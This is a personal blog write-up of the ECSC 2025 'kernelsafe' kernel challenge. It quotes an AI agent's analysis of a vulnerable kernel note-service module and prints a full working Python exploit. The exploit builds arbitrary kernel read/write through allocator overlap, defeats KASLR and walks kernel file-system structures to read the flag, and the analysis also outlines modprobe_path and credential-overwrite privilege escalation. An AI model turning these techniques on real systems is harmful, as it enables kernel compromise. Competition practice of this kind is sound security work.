a9's thoughts on stuff

Whatever comes to mind. Probably C++.

ECSC2025 Kernelsafe notes

Posted at — Jan 15, 2026

I’ve been revisiting some challenges from ECSC 2025 lately to get some practice with pwn in (with the massive help of AI, mind you). This one is kernelsafe, a Linux kernel pwn challenge. While I did a bit of preliminary recon on the challenge during the competition (opening the binary and pressing F5), I haven’t particularly reversed it back then due to a case of Skill Issue.

What we get

We are presented with an unstripped Linux kernel image, its stripped and compressed counterpart, a rootfs archive and a script to run QEMU with the challenge.

Challenge bundle contents

(ignore the .i64s, they’re just the result of scouting)

As can be spoiled, there’s a third party kernel module in the rootfs. The kernel module implements an UDP server hosting a note service. You can add, remove, modify and view notes which are stored in a memory pool in the kernel module’s .bss section. Since I couldn’t be arsed to actually reverse to try to find an exploit, I took Codex, gave it ida-pro-mcp and let it cook for a bit.

After it cooked for roughly 6 minutes, it output the following:

Here’s the intended solve path based on the module logic in IDA.

Protocol / primitives (from `udp_server_thread`):
- UDP server bound to 0.0.0.0:27002 (`sockaddr` = `0x697A0002`, little‑endian port 0x697a = 27002).
- Request is 272 bytes. Layout (u32 little‑endian):
  - `cmd` = dword 0
  - `len` = dword 1
  - `pos` = dword 2
  - `data` starts at dword 2 (ADD) or dword 3 (INS/MOD)
- Commands (little‑endian ASCII): `ADD` ('DDA'), `DEL` ('LED'), `INS` ('SNI'), `MOD` ('DOM'), `DIS` ('SID').
- All responses send \".OK.\" after handling. `DIS` sends data first, then \".OK.\".

Allocator / structure:
- Single bump pointer pool `mPool` in `.bss`, size 0x4000 at offset 0xE00.
- Chunk layout: `[next (8)][size (8)][data…]`.
- `ADD/INS` check `len <= 0xff`; `MOD`/`DIS` clamp to chunk size.

Core bug (intended):
- `delete_string_at_pos(0)` rewinds the bump pointer to the *current head’s* address, regardless of other newer allocations. If the head is not the most recent allocation, this creates an overlap/UAF window.
- You can force “head not last allocated” by inserting at non‑zero position (allocates at end, but links into middle), then deleting head.

Exploit strategy (likely intended):
1) Create overlap to corrupt chunk header
   - Build list so that the head is not the most recent allocation:
     - ADD A (head=A)
     - ADD B (head=B->A)
     - INS at pos=1 (allocates C at end, list B->C->A; C is newest)
   - DEL pos=0 (delete B). This rewinds pool ptr to B’s start while C still exists.
   - Next ADD/INS now overlaps C’s header. Use it to overwrite C’s `next` and `size`.

2) Leak module globals via oversized read
   - Overlap‑write C’s `size` to a large value.
   - `DIS` head with large `len` → data read spills past `mPool` into `.bss`, leaking:
     - `sock` pointer (`struct socket *`)
     - `udp_thread` pointer (`task_struct *`)
     - other module globals

3) Pivot list head to arbitrary kernel address (AAR/AAW primitive)
   - Overlap‑write head’s `next` to `target_addr - 16`.
   - `DEL pos=0` updates `qword_4E08` (head) to that `next` pointer.
   - Now `DIS pos=0` reads from `target_addr` (since data is at `node+16`).
   - `MOD pos=0` writes to `target_addr` (length limited by *(target-8), but usually enough for small writes).

4) Derive kernel base
   - Use AAR on the leaked `sock` pointer:
     - Read `sock->ops` / function pointer to kernel text.
     - Compute kernel base with known offsets from the provided `vmlinux` (typical in ECSC).
   - Alternatively use `udp_thread` to find `task_struct` and locate `cred`.

5) Priv‑escalate and read `/flag.txt`
   Two common intended routes:
   - **Overwrite `modprobe_path`**: set head to `modprobe_path - 16`, `MOD` to/tmp/x”, then trigger modprobe from userland to run a script that cats `/flag.txt`.
   - **Overwrite current creds**: use kernel base + offsets to find current task’s `cred` and zero UIDs/GIDs; then read `/flag.txt` as root.

Why this is the intended path:
- There is no file I/O in the module.
- The pool is fixed-size and adjacent to globals, making a size corruption → infoleak obvious.
- The head‑rewind bug is the only clear allocator mistake and is classic for creating overlap/UAF in CTF kernels.

If you want, I can map a concrete exploit sequence (packet layouts, offsets, and a suggested order to leak pointers and compute kernel base) using your vmlinux offsets.

After poking the model a bit and telling it we don’t have userspace access, it proceeded to make a PoC exploit with its outlined arbitrary read (with an annoying length limit of *(__uint64*)(target_addy - 8) and being fairly slow). After a whole bunch of debugging (including receiving UDP packets being bad, it turning out you need to restart the VM every exploit run), the arbitrary read worked and we got kernel base.

The important pieces of the exploit are below.

def setup_overlap(r, lenA=0x20, lenB=0x20, lenC=0x20, lenD=0x80, c_size=0x500):
    # Layout:
    # A @ 0x00, B @ 0x10+lenA, C @ B+0x10+lenB
    # Insert C at pos=1 so B remains head, then delete B to rewind to B
    # Optionally pad the pool so C sits near the end and small reads can reach .bss.
    pool_ptr = 0
    # Target C data offset so that C_data_off + c_size >= 0x4008 (qword_4E08 - mPool)
    target_c_data = 0x3C00

    # Compute C_data_off if we allocate A,B,C immediately.
    def calc_c_data(pp):
        B_hdr = pp + 0x10 + lenA
        C_hdr = B_hdr + 0x10 + lenB
        return C_hdr + 0x10

    while calc_c_data(pool_ptr) < target_c_data:
        pad = 0xF0  # adds 0x100 including header
        add(r, b"P" * pad)
        pool_ptr += pad + 0x10

    base_off = pool_ptr
    add(r, b"A" * lenA)  # head=A
    pool_ptr += lenA + 0x10
    add(r, b"B" * lenB)  # head=B->A
    pool_ptr += lenB + 0x10
    ins(r, 1, b"C" * lenC)  # head=B->C->A (C allocated at end)
    pool_ptr += lenC + 0x10
    delete(r, 0)  # delete B, rewind pool to B start, head=C->A

    # Allocate D at B start; D becomes head and its data overlaps C header
    # Compute offsets for C header relative to D data
    A_hdr = base_off + 0x0
    B_hdr = base_off + 0x10 + lenA
    C_hdr = B_hdr + 0x10 + lenB
    D_hdr = B_hdr
    D_data = D_hdr + 0x10
    C_data = C_hdr + 0x10
    overlap_off = C_hdr - D_data

    # Overwrite C header: next=0, size=c_size
    new_c_next = 0
    new_c_size = c_size
    payload = b"D" * overlap_off + p64(new_c_next) + p64(new_c_size)
    payload = payload.ljust(lenD, b"D")
    add(r, payload)  # head=D->C->A

    print(
        f"[+] base_off=0x{base_off:04x} C_data_off=0x{C_data:04x} "
        f"target=0x{target_c_data:04x} c_size=0x{c_size:x}"
    )

    # Sanity: if C size was overwritten, reading lenC+1 should succeed.
    test = dis(r, 1, lenC + 1)
    if len(test) != lenC + 1:
        dchk = dis(r, 0, overlap_off + 16)
        print(
            f"[-] overlap check failed (expected {lenC + 1} bytes from C, got {len(test)})"
        )
        if dchk:
            print(f"[-] D payload tail: {dchk[-16:]}")

    return {
        "lenA": lenA,
        "lenB": lenB,
        "lenC": lenC,
        "lenD": lenD,
        "C_data_off": C_data,
        "overlap_off": overlap_off,
        "c_size": c_size,
        "base_off": base_off,
    }


def leak_module_bss(r, layout):
    # Read from C (pos=1) with small size; C is placed near end of pool.
    leak_len = layout["c_size"]
    leak = dis(r, 1, leak_len)

    print(f"Leak ({len(leak)} bytes)")

    # Task struct = 0x448
    # Some cool pointers = 0x470, 0x488
    for i in range(len(leak) // 8):
        print(
            f"+{(i * 8):04x}={int.from_bytes(leak[i * 8 : (i + 1) * 8], byteorder='little'):016x}"
        )

    c_data_off = layout["C_data_off"]

    def qword_at(off):
        return u64(leak[off : off + 8])

    head_off = (HEADPTR_OFF - MPOOL_OFF) - c_data_off
    sock_off = (SOCKPTR_OFF - MPOOL_OFF) - c_data_off

    if (
        head_off < 0
        or sock_off < 0
        or head_off + 8 > len(leak)
        or sock_off + 8 > len(leak)
    ):
        print(
            "[-] Leak window too small to reach module globals; increase c_size or adjust padding."
        )
        return None, None, None

    head_ptr = qword_at(head_off)
    sock_ptr = qword_at(sock_off)

    # Head should be D at B_hdr (include padding base_off)
    B_hdr = layout["base_off"] + 0x10 + layout["lenA"]
    head_off_from_module = MPOOL_OFF + B_hdr
    module_base_from_head = head_ptr - head_off_from_module

    return head_ptr, sock_ptr, module_base_from_head, qword_at(0x470), qword_at(0x488)


def overwrite_c_next(r, layout, next_ptr):
    # Overwrite C->next using the D overlap. This keeps payload small (<0x100).
    overlap_off = layout["overlap_off"]
    payload = b"D" * overlap_off + p64(next_ptr)
    payload = payload.ljust(layout["lenD"], b"D")
    mod(r, 0, payload)  # head is D at pos=0
    if DEBUG_AAR:
        chk = dis(r, 0, overlap_off + 16)
        if len(chk) >= overlap_off + 16:
            got = u64(chk[overlap_off : overlap_off + 8])
            print(f"[*] C->next set to {got:#x} (expected {next_ptr:#x})")
        else:
            print(f"[*] C->next check short read len={len(chk)}")


def aar_read_via_next(r, layout, target_addr, size):
    # Set C->next = target-16, then read node at pos=2 (D->C->target).
    overwrite_c_next(r, layout, target_addr - 0x10)
    return dis(r, 2, size)

However, the model got sidetracked and decided to read the flag from initrd/initramfs, which was not working out (initrd was cleared and initramfs ptrs couldn’t be obtained). Eventually I said “screw it” and decided to scan the entirety of physical memory for the flag. Understandably, this wasn’t a working approach, seeing as scanning the entirety of physical memory with our meme-tier read speed would take way too long. After a while I decided to hack things around and guess the flag’s location in physical memory based on physical memory dumps, seeing as the virtual machine was limited to 64 megabytes of RAM and thus couldn’t have had much room for physical address ASLR. That, however, still wasn’t an optimal idea (and I’m not sure if it would have worked with the real flag).

Eventually I revisited the challenge because I got bored and curious of the proper path of solving this. After a bit of Googling and, uh, modern Googling, it turns out task_struct* contains a pointer to a structure defining various file system information for the task that could be used to walk the file system using the arbitrary read exploit. This seemed like a far more proper solve path than simple brute force. While kernel structure offsets seem to generally depend on the kernel’s build config, this kernel had DWARF debug info embedded, making the job 1000 times easier.

The final exploit:

Code of the final exploit:

import struct
import sys
import time

from pwn import p32, p64, remote, u64

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 31337

# vmlinux symbol addresses (non-KASLR) from `nm -n vmlinux`
INET_DGRAM_OPS = 0xFFFFFFFF81CA0740
INITRD_START_SYM = 0xFFFFFFFF822BD058
INITRD_END_SYM = 0xFFFFFFFF822BD050
PAGE_OFFSET_BASE_SYM = 0xFFFFFFFF81DFA1D8
PHYS_INITRD_START_SYM = 0xFFFFFFFF8220C168
INITRAMFS_START_SYM = 0xFFFFFFFF822A0704
INITRAMFS_SIZE_SYM = 0xFFFFFFFF822A0908
MEMMAP_SYM = 0xFFFFFFFF822FA1B8
VMEMMAP_BASE_SYM = 0xFFFFFFFF81DFA1C8

# module offsets (from IDA)
MODULE_BSS_OFFSET_FROM_BASE = 0x2480
HEADPTR_OFF_FROM_BSS = 0x4008
SOCKPTR_OFF_FROM_BSS = 0x40B0
TASKSTRUCT_OFF_FROM_BSS = 0x40B8

MPOOL_OFF = 0x0E00
HEADPTR_OFF = 0x4E08  # qword_4E08
SOCKPTR_OFF = 0x4EB0  # sock
CLEANUP_OFF = 0x6B0  # cleanup_module entry

PKT_SIZE = 272

CMD_ADD = b"ADD\x00"
CMD_DEL = b"DEL\x00"
CMD_INS = b"INS\x00"
CMD_MOD = b"MOD\x00"
CMD_DIS = b"DIS\x00"
DEBUG_KBASE = False
DEBUG_AAR = False
DEBUG_BYTES = False


def make_pkt(cmd, n=0, pos=0, data=b""):
    pkt = bytearray(PKT_SIZE)
    pkt[0:4] = cmd
    pkt[4:8] = p32(n)
    pkt[8:12] = p32(pos)
    if cmd == CMD_ADD:
        pkt[8 : 8 + len(data)] = data
    elif cmd in (CMD_INS, CMD_MOD):
        pkt[12 : 12 + len(data)] = data
    return bytes(pkt)


def send_cmd(r, cmd, n=0, pos=0, data=b"", want_data=False, wait_ok=True):
    pkt = make_pkt(cmd, n, pos, data)
    r.send(pkt)
    if want_data:
        data = r.recv(65535, timeout=2)
        ok = r.recv(16, timeout=2)
        return data
    if not wait_ok:
        return b""
    ok = r.recv(65535, timeout=2)
    return ok


def add(r, data):
    return send_cmd(r, CMD_ADD, n=len(data), data=data)


def ins(r, pos, data):
    return send_cmd(r, CMD_INS, n=len(data), pos=pos, data=data)


def delete(r, pos):
    return send_cmd(r, CMD_DEL, n=pos)


def mod(r, pos, data):
    return send_cmd(r, CMD_MOD, n=len(data), pos=pos, data=data)


def dis(r, pos, n):
    # DIS sends data (if any) and then ".OK." in a separate UDP packet.
    # Order is not guaranteed, so collect a few packets and pick the non-OK payload.
    # Important: do not receive in send_cmd here, or we may truncate the data packet.
    send_cmd(r, CMD_DIS, n=n, pos=pos, want_data=False, wait_ok=False)
    pkts = []
    deadline = time.time() + 0.2
    while time.time() < deadline and len(pkts) < 3:
        pkt = r.recv(65535, timeout=0.07)
        if not pkt:
            continue
        pkts.append(pkt)
    # Prefer a non-OK packet with the largest payload.
    data_pkts = [p for p in pkts if p != b".OK."]
    if data_pkts:
        return max(data_pkts, key=len)
    return b""


def setup_overlap(r, lenA=0x20, lenB=0x20, lenC=0x20, lenD=0x80, c_size=0x500):
    # Layout:
    # A @ 0x00, B @ 0x10+lenA, C @ B+0x10+lenB
    # Insert C at pos=1 so B remains head, then delete B to rewind to B
    # Optionally pad the pool so C sits near the end and small reads can reach .bss.
    pool_ptr = 0
    # Target C data offset so that C_data_off + c_size >= 0x4008 (qword_4E08 - mPool)
    target_c_data = 0x3C00

    # Compute C_data_off if we allocate A,B,C immediately.
    def calc_c_data(pp):
        B_hdr = pp + 0x10 + lenA
        C_hdr = B_hdr + 0x10 + lenB
        return C_hdr + 0x10

    while calc_c_data(pool_ptr) < target_c_data:
        pad = 0xF0  # adds 0x100 including header
        add(r, b"P" * pad)
        pool_ptr += pad + 0x10

    base_off = pool_ptr
    add(r, b"A" * lenA)  # head=A
    pool_ptr += lenA + 0x10
    add(r, b"B" * lenB)  # head=B->A
    pool_ptr += lenB + 0x10
    ins(r, 1, b"C" * lenC)  # head=B->C->A (C allocated at end)
    pool_ptr += lenC + 0x10
    delete(r, 0)  # delete B, rewind pool to B start, head=C->A

    # Allocate D at B start; D becomes head and its data overlaps C header
    # Compute offsets for C header relative to D data
    A_hdr = base_off + 0x0
    B_hdr = base_off + 0x10 + lenA
    C_hdr = B_hdr + 0x10 + lenB
    D_hdr = B_hdr
    D_data = D_hdr + 0x10
    C_data = C_hdr + 0x10
    overlap_off = C_hdr - D_data

    # Overwrite C header: next=0, size=c_size
    new_c_next = 0
    new_c_size = c_size
    payload = b"D" * overlap_off + p64(new_c_next) + p64(new_c_size)
    payload = payload.ljust(lenD, b"D")
    add(r, payload)  # head=D->C->A

    print(
        f"[+] base_off=0x{base_off:04x} C_data_off=0x{C_data:04x} "
        f"target=0x{target_c_data:04x} c_size=0x{c_size:x}"
    )

    # Sanity: if C size was overwritten, reading lenC+1 should succeed.
    test = dis(r, 1, lenC + 1)
    if len(test) != lenC + 1:
        dchk = dis(r, 0, overlap_off + 16)
        print(
            f"[-] overlap check failed (expected {lenC + 1} bytes from C, got {len(test)})"
        )
        if dchk:
            print(f"[-] D payload tail: {dchk[-16:]}")

    return {
        "lenA": lenA,
        "lenB": lenB,
        "lenC": lenC,
        "lenD": lenD,
        "C_data_off": C_data,
        "overlap_off": overlap_off,
        "c_size": c_size,
        "base_off": base_off,
    }


def leak_module_bss(r, layout):
    # Read from C (pos=1) with small size; C is placed near end of pool.
    leak_len = layout["c_size"]
    leak = dis(r, 1, leak_len)

    print(f"Leak ({len(leak)} bytes)")

    # Task struct = 0x448
    # Some cool pointers = 0x470, 0x488
    for i in range(len(leak) // 8):
        print(
            f"+{(i * 8):04x}={int.from_bytes(leak[i * 8 : (i + 1) * 8], byteorder='little'):016x}"
        )

    c_data_off = layout["C_data_off"]

    def qword_at(off):
        return u64(leak[off : off + 8])

    head_off = (HEADPTR_OFF - MPOOL_OFF) - c_data_off
    sock_off = (SOCKPTR_OFF - MPOOL_OFF) - c_data_off

    if (
        head_off < 0
        or sock_off < 0
        or head_off + 8 > len(leak)
        or sock_off + 8 > len(leak)
    ):
        print(
            "[-] Leak window too small to reach module globals; increase c_size or adjust padding."
        )
        return None, None, None

    head_ptr = qword_at(head_off)
    sock_ptr = qword_at(sock_off)

    # Head should be D at B_hdr (include padding base_off)
    B_hdr = layout["base_off"] + 0x10 + layout["lenA"]
    head_off_from_module = MPOOL_OFF + B_hdr
    module_base_from_head = head_ptr - head_off_from_module

    return head_ptr, sock_ptr, module_base_from_head, qword_at(0x470), qword_at(0x488)


def overwrite_c_next(r, layout, next_ptr):
    # Overwrite C->next using the D overlap. This keeps payload small (<0x100).
    overlap_off = layout["overlap_off"]
    payload = b"D" * overlap_off + p64(next_ptr)
    payload = payload.ljust(layout["lenD"], b"D")
    mod(r, 0, payload)  # head is D at pos=0
    if DEBUG_AAR:
        chk = dis(r, 0, overlap_off + 16)
        if len(chk) >= overlap_off + 16:
            got = u64(chk[overlap_off : overlap_off + 8])
            print(f"[*] C->next set to {got:#x} (expected {next_ptr:#x})")
        else:
            print(f"[*] C->next check short read len={len(chk)}")


def aar_read_via_next(r, layout, target_addr, size):
    # Set C->next = target-16, then read node at pos=2 (D->C->target).
    overwrite_c_next(r, layout, target_addr - 0x10)
    return dis(r, 2, size)


def aaw_write_via_next(r, layout, target_addr, data):
    # Set C->next = target-16, then write via MOD pos=2 to target_addr.
    overwrite_c_next(r, layout, target_addr - 0x10)
    return mod(r, 2, data)


def aaw_write_byte(r, layout, target_addr, value):
    # Write a single byte; requires *(target_addr-8) >= 1.
    return aaw_write_via_next(r, layout, target_addr, bytes([value & 0xFF]))


def aaw_write_qword(r, layout, target_addr, value):
    # Try 8-byte write, fallback to byte-wise writes.
    data = p64(value)
    ok = aaw_write_via_next(r, layout, target_addr, data)
    if ok:
        return ok
    for i, b in enumerate(data):
        aaw_write_byte(r, layout, target_addr + i, b)
    return b""


def patch_node_size(r, layout, node_addr, new_size=0x1000):
    # node layout: [next (8)][size (8)][data...]
    # patch size at node_addr + 8
    aaw_write_qword(r, layout, node_addr + 8, new_size)
    return new_size


def aar_read_min(r, layout, target_addr, size, assert_size=False, can_write=False):
    if can_write:
        aaw_write_qword(r, layout, target_addr - 8, 0xFFFFFFFFFFFFFFFF)

    # Read with adaptive size to satisfy *(target-8) >= size.
    for n in (size, 8, 4, 2, 1):
        if assert_size and n != size:
            break
        if n <= 0:
            continue
        # for _ in range(3):
        data = aar_read_via_next(r, layout, target_addr, n)
        if data:
            return data
        # time.sleep(0.01)
    return b""


def aar_read_qword(r, layout, target_addr):
    data = aar_read_min(r, layout, target_addr, 8, True)
    if len(data) < 8:
        return None
    return u64(data[:8])


def aar_read_bytes(r, layout, target_addr, size):
    out = bytearray()
    for i in range(size):
        b = aar_read_min(r, layout, target_addr + i, 1, True)
        if len(b) != 1:
            if DEBUG_BYTES:
                print(f"[-] byte read failed at {target_addr + i:#x}")
            return None
        out.append(b[0])
        if DEBUG_BYTES:
            print(f"[+] byte {i:02d} @ {target_addr + i:#x} = {b[0]:02x}")
    return bytes(out)


def aar_read_qword_bytewise(r, layout, target_addr):
    data = aar_read_bytes(r, layout, target_addr, 8)
    if not data:
        return None
    return u64(data)


def aar_read_qword_windowed(r, layout, target_addr, back_max=0x40):
    # Try reading a window that ends at target_addr to bypass size checks at target_addr-8.
    for back in range(0, back_max + 1):
        base = target_addr - back
        size = back + 8
        data = aar_read_min(r, layout, base, size, True)
        if len(data) == size:
            return u64(data[-8:])
    return None


def aar_read_chunk(r, layout, addr, size):
    data = aar_read_min(r, layout, addr, size)
    if data:
        return data
    out = bytearray()
    for i in range(size):
        b = aar_read_min(r, layout, addr + i, 1, True)
        out.append(b[0] if b else 0)
    return bytes(out)


def find_kernel_base_from_sock(r, layout, sock_ptr):
    # Read a range of qwords from sock to find a kernel text pointer.
    candidates = []
    for off in range(0, 0x200, 8):
        q = aar_read_qword(r, layout, sock_ptr + off)
        if not q:
            continue
        # Kernel text range heuristic (x86_64): ffffffff80000000 - ffffffffC0000000
        if 0xFFFFFFFF80000000 <= q < 0xFFFFFFFFC0000000:
            # Prefer candidates that match inet_dgram_ops slide and validate by reading page_offset_base.
            # Note for GPT: if this succeeds here, we don't need more scanning for imagebase!
            if not DEBUG_KBASE and (q & 0xFFF) == (INET_DGRAM_OPS & 0xFFF):
                slide = q - INET_DGRAM_OPS
                base = 0xFFFFFFFF81000000 + slide
                if (
                    base & 0xFFF
                ) == 0 and 0xFFFFFFFF80000000 <= base < 0xFFFFFFFFC0000000:
                    test_addr = base + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
                    test = aar_read_min(r, layout, test_addr, 1, True)
                    if test:
                        return base
            candidates.append((off, q))
    if not candidates:
        return None
    if DEBUG_KBASE:
        print("[*] kernel text candidates from sock:")
        for off, q in candidates:
            slide = q - INET_DGRAM_OPS
            base = 0xFFFFFFFF81000000 + slide
            print(f"    off=0x{off:02x} q={q:#x} slide={slide:#x} base={base:#x}")
    # Fallback: try any candidate aligned to 2MB, validate via page_offset_base read.
    for off, q in candidates:
        base = q & ~0x1FFFFF
        if 0xFFFFFFFF80000000 <= base < 0xFFFFFFFFC0000000:
            test_addr = base + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
            test = aar_read_min(r, layout, test_addr, 1, True)
            if test:
                return base
    return None


def main():
    r = remote(HOST, PORT, typ="udp")

    ok = add(r, b"PING")
    if ok != b".OK.":
        print(
            f"[-] No .OK. response to ADD (got {ok!r}); UDP server may be unreachable."
        )
        return
    print("[+] UDP server reachable (.OK. received)")
    # Reset allocator state after the probe.
    delete(r, 0)

    add(r, b"AAAA")
    print(dis(r, 0, 4))
    # Reset allocator state after the test read.
    delete(r, 0)

    layout = setup_overlap(r)
    head_ptr, sock_ptr, module_base, cool_pointer_one, cool_pointer_two = (
        leak_module_bss(r, layout)
    )

    # Diagnostics: read module code ptr via leaked function pointer offsets.
    # If module_base is wrong, these will be inconsistent.
    cleanup_ptr = cool_pointer_one
    add_cold_ptr = cool_pointer_two
    print(f"[+] cleanup_ptr = {cleanup_ptr:#x}")
    print(f"[+] add_string_cold_ptr = {add_cold_ptr:#x}")

    print(f"[+] head_ptr = {hex(head_ptr)}")
    print(f"[+] sock_ptr = {hex(sock_ptr)}")
    module_base_from_cleanup = cleanup_ptr - CLEANUP_OFF
    module_base_aligned = cleanup_ptr & ~0xFFF
    print(f"[+] module_base (from head) = {hex(module_base)}")
    print(f"[+] module_base (from cleanup) = {hex(module_base_from_cleanup)}")
    print(f"[+] module_base (aligned cleanup) = {hex(module_base_aligned)}")

    module_base = module_base_aligned
    print(
        f"[+] Cool ptr 1 = {cool_pointer_one:016x} (udp!cleanup_module), cool pointer two = {cool_pointer_two:016x} (udp!add_string.cold)"
    )

    kbase = find_kernel_base_from_sock(r, layout, sock_ptr)
    if not kbase:
        print("[-] Failed to resolve kernel base")
        return
    print(f"[+] kernel_base = {hex(kbase)}")

    page_offset_base_addr = kbase + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
    initrd_start_addr = kbase + (INITRD_START_SYM - 0xFFFFFFFF81000000)
    initrd_end_addr = kbase + (INITRD_END_SYM - 0xFFFFFFFF81000000)
    phys_initrd_start_addr = kbase + (PHYS_INITRD_START_SYM - 0xFFFFFFFF81000000)
    initramfs_start_addr = kbase + (INITRAMFS_START_SYM - 0xFFFFFFFF81000000)
    initramfs_size_addr = kbase + (INITRAMFS_SIZE_SYM - 0xFFFFFFFF81000000)
    vmemmap_addr = kbase + (VMEMMAP_BASE_SYM - 0xFFFFFFFF81000000)

    print(f"[+] Page offset base = {page_offset_base_addr:016x}")
    print(f"[+] Initrd start = {initrd_start_addr:016x}")
    print(f"[+] Initrd end   = {initrd_end_addr:016x}")
    print(f"[+] phys_initrd_start = {phys_initrd_start_addr:016x}")
    print(f"[+] __initramfs_start = {initramfs_start_addr:016x}")
    print(f"[+] __initramfs_size  = {initramfs_size_addr:016x}")
    print(f"[+] vmemmap base sym = {vmemmap_addr:016x}")
    vmemmap = aar_read_qword_windowed(r, layout, vmemmap_addr)

    print(f"[+] vmemmap = {vmemmap:016x}")

    page_offset_base = aar_read_qword(r, layout, page_offset_base_addr)
    print(f"[+] page_offset_base = {hex(page_offset_base)}")

    task_struct_ptr = (
        module_base + MODULE_BSS_OFFSET_FROM_BASE + TASKSTRUCT_OFF_FROM_BSS
    )
    task_struct = u64(aar_read_via_next(r, layout, task_struct_ptr, 8))

    print(f"[+] Task struct: {task_struct:016x}")

    # DWARF debuginfo
    TASKSTRUCT_FS_OFFSET = 1592

    fs_struct = aar_read_qword(r, layout, task_struct + TASKSTRUCT_FS_OFFSET)

    if fs_struct:
        FS_STRUCT_ROOT_DENTRY_OFFSET = 24 + 8

        dentry_tree_root = aar_read_qword(
            r, layout, fs_struct + FS_STRUCT_ROOT_DENTRY_OFFSET
        )

        if dentry_tree_root:
            print(f"[+] Dentry tree root: {dentry_tree_root:016x}")

            DENTRY_INODE_OFFSET = 48
            DENTRY_INAME_OFFSET = 56
            DENTRY_CHILD_OFFSET = 168
            DENTRY_SIB_OFFSET = 152

            child_pointer = aar_read_qword_windowed(
                r, layout, dentry_tree_root + DENTRY_CHILD_OFFSET
            )
            while child_pointer:
                print(f"[+] Dentry children head: {child_pointer:016x}")

                child_file = child_pointer - DENTRY_SIB_OFFSET
                child_iname = aar_read_via_next(
                    r, layout, child_file + DENTRY_INAME_OFFSET, 16
                )

                print(f"[+] Child iname: {child_iname}")

                if b"flag.txt" in child_iname:
                    print("[+] Found flag dentry!")

                    flag_inode = aar_read_qword_windowed(
                        r, layout, child_file + DENTRY_INODE_OFFSET
                    )

                    if flag_inode:
                        INODE_MAPPING_OFFSET = 48

                        print(f"[+] Flag inode: {flag_inode:016x}")

                        flag_address_space_struct = aar_read_qword(
                            r, layout, flag_inode + INODE_MAPPING_OFFSET
                        )

                        if flag_address_space_struct:
                            ADDRESS_SPACE_PAGES_OFFSET = 8
                            XARRAY_HEAD_OFFSET = 8
                            print(
                                f"[+] Flag i_mapping: {flag_address_space_struct:016x}"
                            )

                            flag_page_xarray_head = aar_read_qword(
                                r,
                                layout,
                                flag_address_space_struct
                                + ADDRESS_SPACE_PAGES_OFFSET
                                + XARRAY_HEAD_OFFSET,
                            )

                            if flag_page_xarray_head:
                                phys_addr = (flag_page_xarray_head - vmemmap) * 64
                                print(
                                    f"[+] struct page* = : {flag_page_xarray_head:016x}"
                                )
                                print(f"[+] Physical address: {phys_addr:08x}")

                                bytes = aar_read_via_next(
                                    r, layout, page_offset_base + phys_addr + 1, 32
                                ).decode()

                                print(f"[+] Test read: {bytes}")

                                if "server" in bytes or "CSC" in bytes:
                                    print("[+] Found flag!")
                                    return

                    break

                child_next_sibling = aar_read_qword_windowed(
                    r, layout, child_file + DENTRY_SIB_OFFSET
                )
                child_pointer = child_next_sibling


if __name__ == "__main__":
    main()

Notes